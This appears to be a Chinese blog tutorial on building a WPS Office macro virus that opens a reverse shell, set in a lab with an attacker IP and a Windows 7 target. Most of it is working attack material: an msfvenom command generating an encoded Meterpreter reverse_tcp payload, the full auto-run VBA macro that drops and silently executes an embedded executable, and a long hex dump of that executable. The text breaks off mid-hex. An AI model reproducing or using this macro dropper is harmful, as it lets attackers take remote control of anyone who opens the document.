WPS Office宏病毒实现shell反弹

已于 2022-10-21 10:41:26 修改
阅读量3.2k 收藏 14
点赞数 3
分类专栏: 网络渗透 漏洞挖掘 文章标签: wps 渗透测试 网络安全
于 2022-10-21 10:26:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/void_zk/article/details/127440884
版权

WPS Office宏病毒实现shell反弹

攻击机ip:192.168.59.128
靶机:win7(安装WPS 2019):192.168.59.142
反弹Shell端口:4444

首先下载安装WPS2019:
在这里插入图片描述
由于WPS新版更新的WPS宏编辑器对kali生成的宏代码兼容性较差,所以这里我们还是装回VB宏编辑器的环境
在这里插入图片描述
在github下载WPS2019vba.exe,并安装该插件(5. https://github.com/eastmountyxz/SystemSecurity-ReverseAnalysis,链接下的Macro目录下)
在这里插入图片描述
切换VB编辑器:
在这里插入图片描述
然后使用kali生成相关的宏病毒代码和载荷:

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.59.128  LPORT=4444 -e x86/shikata_ga_nai -f  vba-exe

在这里插入图片描述

'*kali生成的宏病毒代码:

Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 381 (iteration=0)
x86/shikata_ga_nai chosen with final size 381
Payload size: 381 bytes
Final size of vba-exe file: 20421 bytes
'**************************************************************
'*
'* This code is now split into two pieces:
'*  1. The Macro. This must be copied into the Office document
'*     macro editor. This macro will run on startup.
'*
'*  2. The Data. The hex dump at the end of this output must be
'*     appended to the end of the document contents.
'*
'**************************************************************
'*
'* MACRO CODE
'*
'**************************************************************

Sub Auto_Open()
        Ipkyl12
End Sub

Sub Ipkyl12()
        Dim Ipkyl7 As Integer
        Dim Ipkyl1 As String
        Dim Ipkyl2 As String
        Dim Ipkyl3 As Integer
        Dim Ipkyl4 As Paragraph
        Dim Ipkyl8 As Integer
        Dim Ipkyl9 As Boolean
        Dim Ipkyl5 As Integer
        Dim Ipkyl11 As String
        Dim Ipkyl6 As Byte
        Dim Mpfjsvxhpn as String
        Mpfjsvxhpn = "Mpfjsvxhpn"
        Ipkyl1 = "SWDpdSaaMiphB.exe"
        Ipkyl2 = Environ("USERPROFILE")
        ChDrive (Ipkyl2)
        ChDir (Ipkyl2)
        Ipkyl3 = FreeFile()
        Open Ipkyl1 For Binary As Ipkyl3
        For Each Ipkyl4 in ActiveDocument.Paragraphs
                DoEvents
                        Ipkyl11 = Ipkyl4.Range.Text
                If (Ipkyl9 = True) Then
                        Ipkyl8 = 1
                        While (Ipkyl8 < Len(Ipkyl11))
                                Ipkyl6 = Mid(Ipkyl11,Ipkyl8,4)
                                Put #Ipkyl3, , Ipkyl6
                                Ipkyl8 = Ipkyl8 + 4
                        Wend
                ElseIf (InStr(1,Ipkyl11,Mpfjsvxhpn) > 0 And Len(Ipkyl11) > 0) Then
                        Ipkyl9 = True
                End If
        Next
        Close #Ipkyl3
        Ipkyl13(Ipkyl1)
End Sub

Sub Ipkyl13(Ipkyl10 As String)
        Dim Ipkyl7 As Integer
        Dim Ipkyl2 As String
        Ipkyl2 = Environ("USERPROFILE")
        ChDrive (Ipkyl2)
        ChDir (Ipkyl2)
        Ipkyl7 = Shell(Ipkyl10, vbHide)
End Sub

Sub AutoOpen()
        Auto_Open
End Sub

Sub Workbook_Open()
        Auto_Open
End Sub

'**************************************************************
'*
'* PAYLOAD DATA
'*
'**************************************************************

Mpfjsvxhpn
&H4D&H5A&H90&H00&H03&H00&H00&H00&H04&H00&H00&H00&HFF&HFF&H00&H00&HB8&H00&H00&H00&H00&H00&H00&H00&H40&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H80&H00&H00&H00&H0E&H1F&HBA&H0E&H00&HB4&H09&HCD&H21&HB8&H01&H4C&HCD&H21&H54&H68&H69&H73&H20&H70&H72&H6F&H67&H72&H61&H6D&H20&H63&H61&H6E&H6E&H6F&H74&H20&H62&H65&H20&H72&H75&H6E&H20&H69&H6E&H20&H44&H4F&H53&H20&H6D&H6F&H64&H65&H2E&H0D&H0D&H0A&H24&H00&H00&H00&H00&H00&H00&H00&H50&H45&H00&H00&H4C&H01&H03&H00&H24&H71&HB6&H71&H00&H00&H00&H00&H00&H00&H00&H00&HE0&H00&H0F&H03&H0B&H01&H02&H38&H00&H02&H00&H00&H00&H0E&H00&H00&H00&H00&H00&H00&H00&H10&H00&H00&H00&H10&H00&H00&H00&H20&H00&H00&H00&H00&H40&H00&H00&H10&H00&H00&H00&H02&H00&H00&H04&H00&H00&H00&H01&H00&H00&H00&H04&H00&H00&H00&H00&H00&H00&H00&H00&H40&H00&H00&H00&H02&H00&H00&H46&H3A&H00&H00&H02&H00&H00&H00&H00&H00&H20&H00&H00&H10&H00&H00&H00&H00&H10&H00&H00&H10&H00&H00&H00&H00&H00&H00&H10&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H30&H00&H00&H64&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H2E&H74&H65&H78&H74&H00&H00&H00&H28&H00&H00&H00&H00&H10&H00&H00&H00&H02&H00&H00&H00&H02&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H20&H00&H30&H60&H2E&H64&H61&H74&H61&H00&H00&H00&H90&H0A&H00&H00&H00&H20&H00&H00&H00&H0C&H00&H00&H00&H04&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H20&H00&H30&HE0&H2E&H69&H64&H61&H74&H61&H00&H00&H64&H00&H00&H00&H00&H30&H00&H00&H00&H02&H00&H00&H00&H10&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H40&H00&H30&HC0&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&HB8&H00&H20&H40&H00&HFF&HE0&H90&HFF&H25&H38&H30&H40&H00&H90&H90&H00&H00&H00&H00&H00&H00&H00&H00&HFF&HFF&HFF&HFF&H00&H00&H00&H00&HFF&HFF&HFF&HFF&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&HDD&HC5&HB8&H28&H14&HD0&H15&HD9&H74&H24&HF4&H5A&H2B&HC9&H66&HB9&H04&H02&H31&H42&H1A&H03&H42&H1A&H83&HC2&H2C&HF6&H25&H24&HEC&H9E&HCD&H57&HAC&H5E&HAA&HA8&H1C&H3B&HBB&H77&HE4&H5D&H73&H20&H34&HBB&H44&H16&H40&H1F&HB1&HF2&H81&H96&H88&H5C&HE0&H6B&HFF&H5D&H41&H78&H7C&HA2&H41&HFC&HBF&H8E&H81&HF3&H01&H84&H18&H63&HF0&HA3&H9A&HF1&H98&H01&H5B&H61&H7F&HB9&HB2&H65&HCD&H2A&HB9&HC2&H48&H74&HCB&H87&HFE&H84&HB8&HEE&H66&H45&H89&HF9&H7C&H6A&H11&H13&HA3&H44&H20&H0F&HC0&HC2&HA6&HD4&H31&H65&HBA&H5D&HEC&H62&H02&H4E&H20&H5F&H4C&H46&H09&H0E&H40&H4B&H7E&HBF&H21&HE4&H4D&H6D&HC1&H7E&HF2&H8B&H2B&H1D&HB2&H7B&HF4&H4F&H49&H55&HEA&HD5&H71&HC8&HF4&H5A&HFC&H88&H84&H8B&H42&H39&H58&H64&HC4&H28&HDB&HC8&H4F&H62&HA7&H5F&HAC&H97&H9E&H59&H10&H1F&HC9&H84&H03&H4C&H65&H28&HF5&H95&H8F&H87&H7B&H3A&H40&H9E&HF9&H57&H50&H96&HF4&H3A&H99&HAB&H5E&HF0&HF5&HA1&H6C&H62&H5C&H8C&H0A&HD7&H92&H01&H22&H4B&H9A&HF2&HE5&HF7&HB6&H6B&H1B&H59&HC9&H03&H2A&HBB&H29&HAE&HBA&H63&HBA&HD4&H9C&HD4&H50&H6B&H54&HA3&H0A&H55&H82&HD5&H09&H6C&H83&H94&H9A&HF6&HC9&H42&HBC&H1B&HA7&H02&H71&H78&H18&H09&HA7&H8C&HD7&H6F&H71&H73&H19&HC3&H36&HF8&HCE&HE2&HEB&HDE&H76&HE5&H78&H40&H0F&H72&H80&H6C&H57&H0A&H7D&H77&H57&H28&H93&HD3&HE0&HF4&HFC&H21&H22&H76&H55&HF2&H7C&H35&H8A&HDA&H3C&H35&H38&H72&H91&HD3&H03&HD5&H3A&H6A&H65&H84&H04&HE0&HC9&H21&H77&H7C&H9C&H4E&H26&HFE&H6E&H7D&H8E&H7D&H0B&H47&H12&H36&H00&H21&H27&H7A&HD5&HD8&H7D&H9F&H80&H72&HA0&H0D&H48&HBE&HF3&H2C&H7B&H90&H3F&H46&H5B&HF6&H07&HCC&HEB&HAE&H9F&H1F&H15&HE9&H9D&H8E&H71&HAF&HB2&H17&H40&H61&HD8&H7E&HB3&H70&H1C&H58&H92&HEB&HC0&HAC&H9A&HB5&HE3&H8D&H24&HF4&HB6&H9E&HCD&H67&H6D&H46&HA5&H49&HDA&H58&HC4&H6B&HCA&HE7&HA0&H4F&HD4&HAE&H4F&HAB&H3D&H44&H9A&HAD&HB0&HEA&HC7&H91&HF3&H19&H7B&HC1&H90&H87&H94&H06&H63&HA4&HA8&H59&H3B&H7F&H13&H20&H3C&H28&H14&HD5&HC6&H36&H46&HEE&H91&HE6&H87&HD2&H31&HF0&H4C&H65&HE7&H9D&H9F&HC9&HD7&HEB&HE5&H26&H12&H98&HC3&H3A&H97&H73&H88&H86&H80&H42&H42&HC7&HBA&H78&HA8&HFE&H50&H3C&HF5&HDA&H1A&H11&H64&H7F&HF6&HC9&HBA&HC0&HDC&H14&H7C&H50&HDA&H96&HDE&H29&H15&H0D&HDF&H33&H4F&H58&H0D&H0A&H20&H16&HEC&HB3&HE3&HC2&H4C&H62&HF6&H3F&H83&H39&H58&HE8&HF8&H76&H2A&H45&H53&HC0&H67&HAE&HC2&H13&H34&H69&H16&H1F&H27&H4B&H08&H0D&HDD&HDE&HE3&H33&HB5&HDD&H43&H50&H29&H2F&H97&H63&HD4&H47&H4D&H28&H64&H07&H7B&HE5&H19&HE1&H79&HC3&HE4&HEE&HF2&HBC&HC4&HA9&HA8&HFB&HC0&HBC&HA1&H30&HE6&H09&H5B&H18&H44&HAA&HCC&H1C&H0D&HF1&H4F&H1C&H46&H77&HEC&H4E&HAD&H71&HBB&H62&H22&H1C&HA8&H35&H20&H25&HF2&HEF&H4A&H9B&HC9&H8B&HB5&HC2&H84&HBA&H13&H4C&HC0&HC3&HEE&HAA&HBB&HF6&H52&H11&H51&H1D&H60&H63&H5C&H16&HDF&HFC&H60&H8F&H4B&H73&H2B&HC1&H1A&H31&HEA&H49&H55&H39&HD4&H42&H6B&H02&HA4&H56&H4A&H59&H56&HF1&H0B&H0B&H6C&H04&HAF&HC8&H28&H4D&H48&HCB&HD1&H06&H73&H45&H63&HB6&HC5&H6D&HCB&HE8&HDC&H4D&H72&H13&H62&H6A&H62&HDC&HC0&H3A&HA3&HC1&H43&H08&H84&H36&HE6&HAC&HE8&HBB&HC3&H7D&H32&H35&HEB&H2F&H52&H35&H86&H18&H8B&H1D&HE4&HD6&HE8&H09&H6B&H1D&H9C&HF1&H40&H05&H37&H75&HEE&HB3&HD1&HE6&HF8&HA4&HAF&H0D&H70&H1A&HB2&HFE&H97&HBA&H50&H70&HE4&H54&HD2&HD5&H55&H5D&H04&HA9&HDB&H87&H82&HAD&H6B&H67&H50&H27&H7A&H38&H02&H5F&H80&H2B&H39&H9B&HFF&HD4&HC8&H36&HB2&H8C&H73&H23&HE3&H62&H29&H4E&H18&H3D&HD6&HF9&H1B&H6A&HBE&H1F&HCC&H55&HBA&H26&HCE&H46&H90&H09&HC2&H2A&HAF&H09&H1B&HD2&H38&H92&H78&H04&H6A&H6F&H34&H9F&H26&H42&H0B&H78&H79&HDA&H93&HE1&H99&H36&H9E&HB2&H86&H1F&H2A&HB9&HA3&H24&H08&H6E&HC5&HD6&H1E&H0E&H5A&HF4&H25&H7B&HEB&H0E&H45&H9E&HD3&HD6&H22&H26&HDA&HA5&H25&HF1&H62&HC4&H58&HD5&HD9&H9E&HF2&H2C&H5D&HD9&H54&H62&HA5&HDB&HEC&H45&H9E&H23&H30&H79&H94&H95&HC6&HB0&H4D&H03&H5D&H62&H52&H53&H6F&H34&H8E&H22&HAC&H70&H6C&H1E&HB1&H71&H64&HA9&H15&H72&H9C&H83&HFC&H1F&H51&HBC&HB6&HE4&HF8&H62&H50&HF2&H40&H04&H3F&H87&H01&H1B&H65&H87&HE8&H3E&HCE&HFE&HC9&H36&HE1&H8E&H04&H41&HDA&H65&HCE&H58&H71&H35&HEF&H0A&HE0&H59&H13&H79&H75&HEB&H4F&H5C&H77&H4A&H43&HAB&HD6&HC8&HEE&HB2&HD3&H46&H9D&HCA&H11&H1A&HC7&HBD&HE3&HAE&HA1&H8A&HD4&HD5&H7C&HDF&H6A&H9B&HB7&HAD&H27&H3E&H5F&HBD&H4F&H65&HC7&H0F&H89&H9A&HDC&HCF&H98&H80&HAE&H05&H74&HDF&HF9&HB4&HA8&H00&H39&HED&HAB&H40&H02&HAC&H05&H00&H4D&HF3&H41
&HB4&H19&H3D&HFB&HDD&HC5&HFF&H9B&H96&H9A&H70&HF7&HE6&HD7&H44&H36&HD1&H03&H76&HB9&H20&HB4&HF1&H82&HD4&H04&H28&H48&HDF&H2C&H22&H01&H48&H42&HFE&HD1&H49&HDC&H7B&H4E&H1C&H41&HC1&H7F&H58&H30&H82&HD5&H09&HA4&H64&H6F&HEE&H80&H2B&H14&HA9&H16&H67&HF4&H64&HEA&H0C&HD6&H99&HC4&HDE&HE5&HEA&H7C&H44&HAB&H18&H17&HDD&HC0&H9E&HBC&HE7&H4D&H2C&H22&HBD&HDE&H02&H52&HF6&H2B&H8E&HFF&HD3&H96&HBA&H7D&H45&HA1&H28&H03&H55&H51&HCF&HDD&H5A&H72&H9E&H59&HF6&H2A&H4C&H61&HAA&H1A&H97&HA9&HC8&HFF&H5F&HDC&HC2&H94&H79&HF0&H80&HAB&H36&H18&HD0&HD8&H43&H4B&H2B&H43&HBF&HCB&H21&HEF&H19&H8C&H6E&H68&H02&HE8&H6E&HAB&H43&H57&HD1&HF8&H82&HBD&H95&H11&H72&H17&HA3&HB2&H29&H2F&HE6&H29&HE5&H4F&H68&H80&H18&HAF&HDD&HC4&H78&H74&H15&H8D&H1C&HD4&HC5&H11&H33&H96&H41&H16&H53&H0B&H79&HF2&HB8&HFA&HB8&H64&HB4&H81&H25&HE0&H7E&H42&H2A&H45&HA6&H10&H63&H3F&HE1&HBB&HA3&HF5&H8A&H6F&H27&HC2&H7D&HC9&H78&HAA&HE0&HDB&H4A&HD8&HDC&H9A&HE8&HB1&H45&H68&H5F&H1E&H49&H23&HBF&H9F&H2F&HE8&H44&H38&H76&H02&HE9&HD1&H7F&H73&H84&HB3&H24&H4D&HF3&H52&H9D&H9C&HB7&HB0&H5A&HEC&H7E&H03&H59&HF9&H96&HEC&H1E&HFC&H63&H7C&H58&H18&H4E&HA6&HAE&H79&HCA&H6A&H8E&HB7&H79&H29&HCD&H02&HC4&H66&H52&H18&HB9&H51&H92&H84&HA3&H40&HBE&H89&H96&H87&H67&HC0&H5C&H4F&HAC&HA0&HCD&H8C&H2B&HE6&H35&H5D&HAF&H18&H73&H50&H86&H0C&H55&HB2&H4D&HC7&H64&H84&H18&HE1&HCE&H61&H5B&HA5&H25&H58&HD2&HA6&HD9&H67&HEC&H32&H10&H78&H82&HE6&H95&H0D&H7A&HD5&HF4&H7C&H15&H8C&H8D&HCD&H28&H7F&H9C&H00&HD5&H3C&H09&HD3&HA3&HFA&HF4&HF8&H1A&H77&HD5&HC4&H31&H4F&H99&H25&H43&H28&H49&HA8&HA6&HBD&H59&H94&H5B&HF6&H68&HE2&HDA&HD8&HFB&H2A&HED&H92&H2C&HC8&HB8&HC1&H4C&H09&HB5&HEB&HB5&HB2&HD8&HE0&H82&H5A&H52&HCF&H86&H90&HEC&H9B&H60&H19&H51&HEB&HD0&HAB&H55&H58&HC0&HDB&H59&H53&HE7&H11&HE4&H91&H7F&H65&HB2&HBC&H33&HF5&H4E&H28&H67&H0B&H17&H9A&H19&HF4&H92&HC7&H02&H4B&HE1&HD8&H6F&H09&HF4&H72&H57&HB6&H02&HA4&H89&H8E&HC4&H98&HE9&H60&HD1&H06&HDC&H08&H2B&H26&H3E&H15&H75&HA6&HE6&HCF&H20&H61&H30&H94&H98&HFC&H08&H8B&HAC&HDE&H1F&H7E&H97&HE9&H3F&H80&H9E&H80&HC1&HB7&HC2&HAB&H93&HC4&H91&H23&H61&H5E&H3D&H7B&HCC&H8C&HE6&H32&H5C&H9E&H83&H8B&HBB&H7D&HBD&HD1&HC7&HC7&HDA&HAE&H65&H28&HBF&H64&H23&H58&H65&H00&HD4&HA0&H77&H00&HE8&H52&H34&HF9&HCD&H5A&HC9&H5F&H28&HAF&H86&H83&H2C&HEA&H71&H05&H4B&H59&H10&HDC&H69&HFE&H3F&HFC&H00&H05&H83&HFB&H86&H52&H81&HAC&H32&H07&HB4&H6A&HE3&H56&H3F&HB4&H9A&HD6&H11&H29&HC4&H23&H28&H6E&HEB&H7E&HF3&H2A&H39&H8B&HAA&H3B&H5D&H4C&H0C&H95&H2C&H88&H50&HE4&H32&HF1&H3C&H45&HEF&HFD&HAF&H80&H16&H0C&H74&H70&HFE&HB3&H24&H88&H24&HE0&H2E&HB4&H85&H8D&H39&HAA&HD0&H28&HA6&HFC&H54&HF8&H88&H1A&H94&HCC&H73&H3E&HD0&H76&H60&H3F&HFC&H67&H78&H45&H1F&H53&HCB&H4B&HB9&H3B&H7A&H00&H48&H53&H7E&HB5&H87&HD1&H0A&HE5&HB0&HFD&H2B&H8C&H57&HBE&HF4&H8D&HBD&H7B&H6D&H1D&HB3&H9B&H72&H41&HE6&HC4&H04&HB9&HBD&H9D&H48&H9F&H2C&H0D&HCE&H35&H65&H05&H01&HF3&H3A&H3B&HF0&H96&H9E&H59&H8F&H03&H7E&H4F&HBD&H87&HD4&H6A&HE7&HF1&HAA&H1F&H1D&H01&H98&H43&H7C&HB2&HEA&H66&HC1&H7E&H3C&H42&H65&H5F&H2B&H62&HAE&H07&HF1&H9B&HFE&H24&H8C&H91&H59&HE1&H64&H45&H22&HDA&HDE&H3D&H34&H2E&HB8&HA3&HF0&H5F&H8B&H0F&HA5&H38&H60&HE7&H35&H2F&H2C&H8C&H8F&H98&H05&H69&HEB&H37&H27&HD8&H83&HCF&H3B&H5F&HDC&HCB&HA9&H21&HD1&HBA&HFF&H7E&H52&HF9&HF9&H2B&HFF&HBA&H7A&H42&H00&H2D&HFA&H39&HBE&H10&HC6&HD1&H86&H6C&H93&HCE&HE6&H3F&H45&HE5&H80&H02&H5B&HBA&HAD&H8F&H54&HB2&HCA&H8B&HA9&H37&H6D&H6E&HD4&HBD&H46&H87&H0F&H12&H04&HBA&H62&H9C&HE4&HEA&H4B&H1F&H9E&HF1&HFD&H26&HE3&H26&H45&HA8&HC8&H72&H7B&H15&H55&H54&HE1&H6B&HEA&H01&H82&H76&H10&HDD&HC4&H87&H47&HFD&HFB&H8E&H8A&H55&H83&H6E&H4E&H45&HA3&HB9&H46&H0D&HFA&HB1&H05&HE9&HB1&HF5&HC5&HCC&H10&H4D&H99&H51&H64&HA1&H52&H1F&HEE&H32&H6B&H5D&HAD&H9D&H4F&H72&HA0&HAF&HBD&HF3&H08&H07&H46&HEC&H9A&H00&H62&HF4&H12&H83&HA3&H74&HEF&H49&H4F&HBF&H91&HA0&HBB&HBC&HE6&HCF&H03&HCE&HD1&HA2&H75&H93&HCF&H45&H77&HA3&H2A&H7A&H56&HB8&H8B&H86&H12&H3F&HB9&H07&H2E&H99&HE8&H61&H08&HE4&H74&HDF&H44&H41&H6D&H69&H80&HE8&HFF&H40&HF4&H48&HB5&H24&HAE&HF9&HD1&H7B&H3A&H77&H2D&H3A&HFC&H95&H2C&HBC&HD5&H3A&H72&HF7&H43&HDF&H73&HC8&HE1&H05&H70&H52&H5C&HC4&HAB&HC4&HC5&H19&H64&HCB&HC6&H45&H69&H9F&HFA&H30&H5D&H79&HB1&H5C&HE9&HE1&H59&H04&H4D&HBB&H2B&HCB&HC3&H06&H1A&H7C&H6A&H98&H51&H21&HC5&H58&H0A&HAE&H31&HB5&HF7&H51&H15&HA5&H1C&HE3&H95&HAB&H63&HE0&HEA&H45&H69&H69&H1E&H07&HDA&H15&H86&HBC&HB6&HA1&H50&H2B&HF6&H3E&H7F&HBC&H99&H7A&H68&H55&HDA&HB2&H71&H1D&HC8&H6E&H8C&HDB&HBC&H41&H1F&H7D&H22&HDE&HBB&H51&HA2&H52&H75&HCB&HB2&HA2&HBB&H45&HAE&HEB&H6A&HB8&H16&HCD&HA9&H19&HAF&H96&H22&H7D&H6F&H76&H57&HAD&HFE&H14&H6C&H02&HFA&H7C&H49&H39&H82&H80&HD1&H43&H43&HF3&H14&H59&H10&H41&H93&HCE&H16&H14&H71&HC1&H09&H4E&H21&H31&HD5&HD2&H27&HEB&H69&H93&HCA&HAC&H23&H3E&HC1&H2F&H11&H53&H3D&H60&HC1&H7A&H94&H04&HE3&H52&HB1&H05&H1C&H0A&HF4&H59&H9E&H79&H40&HDD&H62&HDF&H33&HF7&H7D&H07&H9D&H5B&H40&HCE&H16&H4D&H96&H83&H8D&HDB&HCB&H0C&HEF&H1F&H89&H29&H54&H9B&HBE&H45&HE2&H77&H43&HCF&H11&HA5&H3C&H51&H0D&H98&H06&HB7&H1B&H51&H26&H45&H74&HA0&H69&H3D&H5F&HE3&H56&H6D&H59&H32&H4C&H2D&H7D&HDA&H08&HA5&H70&HA6&H31&H94&H65&H3F&HDE&H87&HE3&H84&H9A&H4B&H3A&HF6&H25&H28&H35&HE3&H02&HC1&H09&H9F&H81&HB4&HCE&HDD&H50&H09&HC5&H24&H91&H8C&H5B&H52&H6D&H7C&H0A&H49&HC6&H37&HF1&H10&HCF&HF7&H48&H36&HE1&H2E&HA2&H13&HCB&H29&H73&HC2&H52&HEB&HE3&H3F&HF2&H84&HE3&HC4&H91&H5D&H5F&HC1&H4E&H4A&HBE&HF2&H36&H4B&H1E&H43&H6C&H7F&H5D&H05&HFA&H0F&HE7&H3F&HB3&H8D&H47&HDB&H3D&HA2&H41&H8B&H4C&HF4&H87&HC8&H49&H9F&H5F&H52&H76&H46&HBA&HCF&H18&H68&HF4&HD8&H8E&H4B&HA2&HE5&HDA&HFD&H1B&HB6&HD8&HEA&HF3&HC0&H3E&H28&HD6&H8C&HB5&H2E&HBA&H8D&H27&HCB&H62&HDA&HF7&H2A&H99&HC1&HBB&HB1&HF1&HA2&HB3&HBE&H58&H2F&H83&HEE&H7A&HC5&HAB&H27&H57&HE6&HC7&HE3&H9F&HB7&HDF&H0D&HDA&HDB&HC0&HB4&H04&HEE&H45&H49&HB7&H4E&H77&H21&H8F&H9A&HD9&H23&H78&H2E&H34&H53&H34&HE9&HF7&H3E&H3D&H35&H90&HCD&HB5&HDB&H9B&HCF&HE6&H71&H64&HC3&H24&H23&H42&H60&HD5&H77&H8D&H53&HE4&H0B&H09&H89&H03&H44&H34&H68&HCA&H27&HC9&H73&HAE&H6D&H40&H2A&H53&HC9&HF9&HF1&HFC&H76&HA1&HD1&HD1&H88&HAC&HEC&H8F&HC5&H9A&HDE&H0E&H14&HC7&H1F&H70&H6C&H7F&HF5&HB8&H29&H3A&HE3&H83&HF8&HFE&HC0&HE3&HB5&H7C&HBE&HE1&HB8&H3D&HA3&H93&H48&H8A&HB9&HBB&H3F&H40&HCA&HCB&H01&H93&H40&H31&H5A&H33&H42&H0E&H79&HA0&H13&HB4&H44&H94&HC8&HF2&H51&H57&HEF&HD5&H2F&H73&HB2&H14&H4A&H8B&HF1&HE4&H8D&HA1&H40&H09&HFE&H3E&HB2&HA6&H93&H2D&HBF&HE0&H6C&H67&HEA&HDF&HAF&H6F&HA0&H72&H6F&H1E&H82&H49&H05&HCD&HFB&H88&H80&HBE&HC0&HBB&H7B&HBB&HFE&H4C&H47&H15&H25&H52&HC9&H01&H9F&H61&H78&HD7&H90&H52&H88&H14&HC0&HEC&HD7&HAF&H67&HA6&H5B&H5B&HBC&H8A&HDC&H57&H53&H11&H54&H0A&H2D&H4E&H17&H93&HD0&HEC&HDF&H02&HB1&HF5&H65&H49&HF1&H14&HAB&H76&H8F&HB0&HDA&H78&HF6&H8E&H4C&H8A&H91&HB4&HE0&H9D&H87&H5F&HA5&H96&H66&H93&HEA&H25&HD7&HC5&HAF&H74&H5A&H6D&HC9&H23&HDB&HDF&H8B&H23&H40&H84&HEE&H1B&H19&H8D&H19&H8A&HE3&H2B&HCA&HE7&H2A&H6C&HB5&H06&H8E&H08&H31&HF7&H1F&HAD&H6F&H38&H6F&H8D&HF3&H28&H37&H83&HE8&HC2&H38&HE2&H08&HF9&HE1&H76&H79&H41&H54&HC4&HEC&H1F&H7E&HC8&HF1&HE5&H23&H0C&HEE&H8A&HCA&H7F&HFD&H27&H4C&H57&H70&H78&HD2&HD9&H56&HFB&H21&H3A&H0F&H77&H52&H38&H5E&HB9&H7C&HAE&HE9&H40&H41&H31&H1E&H64&HB7&H7B&HFA&HFF&H5A&H3C&HCC&H35&H17&H07&H44&H51&H79&H0C&HD8&HC8&HB3&H0F&HF8&H7D&H03&HE0&H6F&H04&H8B&HA3&H2B&H23&H27&H52&H48&H8F&HDA&H6A&H38&H79&H48&H47&H30&H35&H6F&H94&H51&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H